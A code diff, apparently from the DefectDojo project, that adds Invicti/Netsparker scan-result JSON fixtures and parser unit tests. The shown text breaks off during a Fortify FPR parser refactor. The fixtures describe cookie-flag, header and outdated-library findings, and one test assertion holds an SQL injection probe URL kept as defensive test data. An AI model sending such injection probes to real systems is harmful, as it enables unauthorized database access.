    The lack of Referrer-Policy header might affect privacy of the users and site's itself

    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Referrer-Policy Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "

    In a response header:

    \n
    Referrer-Policy: no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading 
    \n

    In a META tag

    \n
    <meta name=\"Referrer-Policy\" value=\"no-referrer | same-origin\"/>
    \n

    In an element attribute

    \n
    <a href=\"http://crosssite.example.com\" rel=\"noreferrer\"></a> 
    \n

    or

    \n
    <a href=\"http://crosssite.example.com\" referrerpolicy=\"no-referrer | same-origin | origin | strict-origin | no-origin-when-downgrading\"></a>
    ", + "RemedialProcedure": "

    Please implement a Referrer-Policy by using the Referrer-Policy response header or by declaring it in the meta tags. It’s also possible to control referrer information over an HTML-element by using the rel attribute.

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "ReferrerPolicyNotImplemented", + "Url": "http://php.testsparker.com/" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/invicti_one_finding.json b/unittests/scans/invicti/invicti_one_finding.json new file mode 100644 index 00000000000..9b717a0f5e6 --- /dev/null +++ b/unittests/scans/invicti/invicti_one_finding.json @@ -0,0 +1,85 @@ +{ + "Generated": "25/06/2021 09:59 AM", + "Target": { + "Duration": "00:00:41.3968969", + "Initiated": "25/06/2021 09:53 AM", + "ScanId": "663eb6e88d9e4f4d9e00ad52017aa66d", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/invicti_zero_finding.json b/unittests/scans/invicti/invicti_zero_finding.json new file mode 100644 index 00000000000..b33009971e5 --- /dev/null +++ b/unittests/scans/invicti/invicti_zero_finding.json @@ -0,0 +1,10 @@ +{ + "Generated": "25/06/2021 09:57 AM", + "Target": { + "Duration": "00:01:16.6130466", + "Initiated": "25/06/2021 01:42 AM", + "ScanId": "0a110f61b1f949ff30c8ad5104dfd9f5", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [] +} \ No newline at end of file diff --git a/unittests/scans/invicti/issue_10311.json b/unittests/scans/invicti/issue_10311.json new file mode 100644 index 00000000000..3157fafb142 --- /dev/null +++ b/unittests/scans/invicti/issue_10311.json @@ -0,0 +1,173 @@ +{ + "Generated": "03/02/2019 15:50:29 (UTC-06:00)", + "Target": { + "ScanId": "fg49hk5", + "Url": "https://www.sampleweb.org/", + "Initiated": "03/02/2019 15:48:23 (UTC-06:00)", + "Duration": "00:01:20.4322725" + }, + "Vulnerabilities": [ + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsSecure", + "Name": "Cookie Not Marked as Secure", + "Severity": "High", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A6", + "Owasp2017": "A3", + "Wasc": "15", + "Cwe": "614", + "Capec": "102", + "Pci31": "6.5.10", + "Pci32": "6.5.10", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

    This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

    ", + "Impact": "
    This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
    ", + "ExploitationSkills": "
    To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to be understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to to a system between the victim and the web server.
    ", + "RemedialProcedure": "
    Mark all cookies used within the application as secure.
    ", + "RemedyReferences": "", + "ExternalReferences": "
    ", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "BootstrapjsOutOfDate", + "Name": "Out-of-date Version (Bootstrap)", + "Severity": "Medium", + "Certainty": 90, + "Confirmed": false, + "Classification": { + "Owasp": "A9", + "Owasp2017": "A9", + "Wasc": null, + "Cwe": null, + "Capec": "310", + "Pci31": "6.2", + "Pci32": "6.2", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "4.0.0" + }, + { + "Name": "Latest Version", + "Value": "4.3.1" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 3/1/2019 vulnerability database content." + } + ], + "KnownVulnerabilities": [ + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + } + ], + "Description": "

    Netsparker identified that the target web site is using Bootstrap and detected that it is out of date.

    ", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "RemedialActions": "", + "ExploitationSkills": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Bootstrap to the latest stable version.

    \n
    ", + "RemedyReferences": "
    ", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsHttpOnly", + "Name": "Cookie Not Marked as HttpOnly", + "Severity": "Low", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A5", + "Owasp2017": "A6", + "Wasc": "15", + "Cwe": "16", + "Capec": "107", + "Pci31": null, + "Pci32": null, + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": null + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as HTTPOnly.

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    ", + "ExploitationSkills": "", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "ExternalReferences": "
    ", + "ProofOfConcept": "" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/invicti/issue_9816.json b/unittests/scans/invicti/issue_9816.json new file mode 100644 index 00000000000..14f7d156381 --- /dev/null +++ b/unittests/scans/invicti/issue_9816.json @@ -0,0 +1,173 @@ +{ + "Generated": "03/02/2019 15:50:29 (UTC-06:00)", + "Target": { + "ScanId": "fg49hk5", + "Url": "https://www.sampleweb.org/", + "Initiated": "03/02/2019 15:48:23 (UTC-06:00)", + "Duration": "00:01:20.4322725" + }, + "Vulnerabilities": [ + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsSecure", + "Name": "Cookie Not Marked as Secure", + "Severity": "High", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A6", + "Owasp2017": "A3", + "Wasc": "15", + "Cwe": "614", + "Capec": "102", + "Pci31": "6.5.10", + "Pci32": "6.5.10", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.

    This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.

    ", + "Impact": "
    This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
    ", + "ExploitationSkills": "
    To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to be understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to to a system between the victim and the web server.
    ", + "RemedialProcedure": "
    Mark all cookies used within the application as secure.
    ", + "RemedyReferences": "", + "ExternalReferences": "
    ", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "BootstrapjsOutOfDate", + "Name": "Out-of-date Version (Bootstrap)", + "Severity": "Medium", + "Certainty": 90, + "Confirmed": false, + "Classification": { + "Owasp": "A9", + "Owasp2017": "A9", + "Wasc": null, + "Cwe": null, + "Capec": "310", + "Pci31": "6.2", + "Pci32": "6.2", + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "4.0.0" + }, + { + "Name": "Latest Version", + "Value": "4.3.1" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 3/1/2019 vulnerability database content." + } + ], + "KnownVulnerabilities": [ + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + }, + { + "Title": "bootstrap.js Cross-Site Scripting (XSS) Vulnerability", + "Severity": "Medium" + } + ], + "Description": "

    Netsparker identified that the target web site is using Bootstrap and detected that it is out of date.

    ", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "RemedialActions": "", + "ExploitationSkills": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Bootstrap to the latest stable version.

    \n
    ", + "RemedyReferences": "
    ", + "ExternalReferences": "", + "ProofOfConcept": "" + }, + { + "Url": "https://www.sampleweb.org/", + "Type": "CookieNotMarkedAsHttpOnly", + "Name": "Cookie Not Marked as HttpOnly", + "Severity": "Low", + "Certainty": 100, + "Confirmed": true, + "Classification": { + "Owasp": "A5", + "Owasp2017": "A6", + "Wasc": "15", + "Cwe": "16", + "Capec": "107", + "Pci31": null, + "Pci32": null, + "Hipaa": null + }, + "HttpRequest": { + "Method": "GET", + "Content": "GET / HTTP/1.1\r\nHost: www.sampleweb.org\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\r\nX-Scanner: Netsparker\r\n\r\n", + "Parameters": [ ] + }, + "HttpResponse": { + "StatusCode": 200, + "Duration": 644.6389, + "Content": "HTTP/1.1 200 OK\r\nX-Cache: MISS\r\nX-Timer: S1551563304.277046,VS0,VE20\r\nAge: 0\r\nCache-Control: max-age=600\r\nETag: W/\"5b8fd2e9-6807\"\r\nAccess-Control-Allow-Origin: *\r\nX-Fastly-Request-ID: 0345654a04250c6d1c420d386643c1f6dc7c3c24\r\nX-Served-By: cache-chi21166-CHI\r\nConnection: keep-alive\r\nExpires: Sat, 02 Mar 2019 21:58:24 GMT\r\nAccept-Ranges: bytes\r\nX-Cache-Hits: 0\r\nContent-Length: 5954\r\nX-GitHub-Request-Id: 0820:594C:6A9400:84F805:5C7AFA26\r\nVary: Accept-Encoding\r\nVia: 1.1 varnish\r\nLast-Modified: Wed, 05 Sep 2018 12:58:17 GMT\r\nContent-Type: text/html; charset=utf-8\r\nServer: GitHub.com\r\nDate: Sat, 02 Mar 2019 21:48:24 GMT\r\nContent-Encoding: \r\n\r\n" + }, + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "cookieconsent_status" + }, + { + "Name": "Cookie Source", + "Value": "JavaScript" + } + ], + "KnownVulnerabilities": [ ], + "Description": "

    Netsparker identified a cookie not marked as HTTPOnly.

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "RemedialActions": "
    1. See the remedy for solution.
    2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    ", + "ExploitationSkills": "", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "ExternalReferences": "
    ", + "ProofOfConcept": "" + } + ] +} \ No newline at end of file diff --git a/unittests/tools/test_invicti_parser.py b/unittests/tools/test_invicti_parser.py new file mode 100644 index 00000000000..aca5bfadd78 --- /dev/null +++ b/unittests/tools/test_invicti_parser.py @@ -0,0 +1,98 @@ +from dojo.models import Test +from dojo.tools.invicti.parser import InvictiParser +from unittests.dojo_test_case import DojoTestCase + + +class TestInvictiParser(DojoTestCase): + + def test_parse_file_with_one_finding(self): + with open("unittests/scans/invicti/invicti_one_finding.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + def test_parse_file_with_multiple_finding(self): + with open("unittests/scans/invicti/invicti_many_findings.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(16, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + with self.subTest(i=1): + finding = findings[1] + self.assertEqual("Critical", finding.severity) + self.assertEqual(89, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7=10") + + with self.subTest(i=2): + finding = findings[2] + self.assertEqual("Medium", finding.severity) + self.assertEqual(205, finding.cwe) + self.assertEqual("25/06/2021", finding.date.strftime("%d/%m/%Y")) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com") + + def test_parse_file_issue_9816(self): + with open("unittests/scans/invicti/issue_9816.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual(614, finding.cwe) + self.assertEqual("03/02/2019", finding.date.strftime("%d/%m/%Y")) + + def test_parse_file_issue_10311(self): + with open("unittests/scans/invicti/issue_10311.json", encoding="utf-8") as testfile: + parser = InvictiParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual(614, finding.cwe) + self.assertEqual("03/02/2019", finding.date.strftime("%d/%m/%Y")) From fa4ed047e563cc1c929d83858bc3027701f2b52e Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:33:24 -0500 Subject: [PATCH 05/12] Fortify Parser: Fortification of the the FPR parsing (#10901) * Fortify Parser: Fortification of the the FPR parsing * Update dojo/tools/fortify/parser.py Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- dojo/tools/fortify/fpr_parser.py | 203 ++++++++++++++++++++++--------- dojo/tools/fortify/parser.py | 3 + 2 files changed, 148 insertions(+), 58 deletions(-) diff --git a/dojo/tools/fortify/fpr_parser.py b/dojo/tools/fortify/fpr_parser.py index d0d62e2aa92..a5a11051356 100644 --- a/dojo/tools/fortify/fpr_parser.py +++ b/dojo/tools/fortify/fpr_parser.py @@ -1,9 +1,10 @@ import re import zipfile +from xml.etree.ElementTree import Element from defusedxml import ElementTree -from dojo.models import Finding +from dojo.models import Finding, Test class FortifyFPRParser: @@ -12,70 +13,156 @@ def parse_fpr(self, filename, test): input_zip = zipfile.ZipFile(filename.name, "r") else: input_zip = zipfile.ZipFile(filename, "r") - zipdata = {name: input_zip.read(name) for name in input_zip.namelist()} - root = ElementTree.fromstring(zipdata["audit.fvdl"].decode("utf-8")) + # Read each file from the zip artifact into a dict with the format of + # filename: file_content + zip_data = {name: input_zip.read(name) for name in input_zip.namelist()} + root = self.identify_root(zip_data) + return self.parse_vulnerabilities_and_convert_to_findings(root, test) + + def identify_root(self, zip_data: dict) -> Element: + """Iterate through the zip data to determine which file in the zip could be the XMl to be parsed.""" + # Determine where the "audit.fvdl" could be + audit_file = None + for file_name in zip_data: + if file_name.endswith("audit.fvdl"): + audit_file = file_name + break + # Make sure we have an audit file + if audit_file is None: + msg = 'A search for an "audit.fvdl" file was not successful. ' + raise ValueError(msg) + # Parser the XML file and determine the name space, if present + root = ElementTree.fromstring(zip_data.get(audit_file).decode("utf-8")) + self.identify_namespace(root) + return root + + def identify_namespace(self, root: Element) -> None: + """Determine what the namespace could be, and then set the value in a class var labeled `namespace`""" regex = r"{.*}" matches = re.match(regex, root.tag) try: - namespace = matches.group(0) + self.namespace = matches.group(0) except BaseException: - namespace = "" + self.namespace = "" + + def parse_vulnerabilities_and_convert_to_findings(self, root: Element, test: Test) -> list[Finding]: + """Parse the XML and generate a list of findings.""" items = [] for child in root: if "Vulnerabilities" in child.tag: for vuln in child: - ClassID = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}ClassID").text - Kingdom = 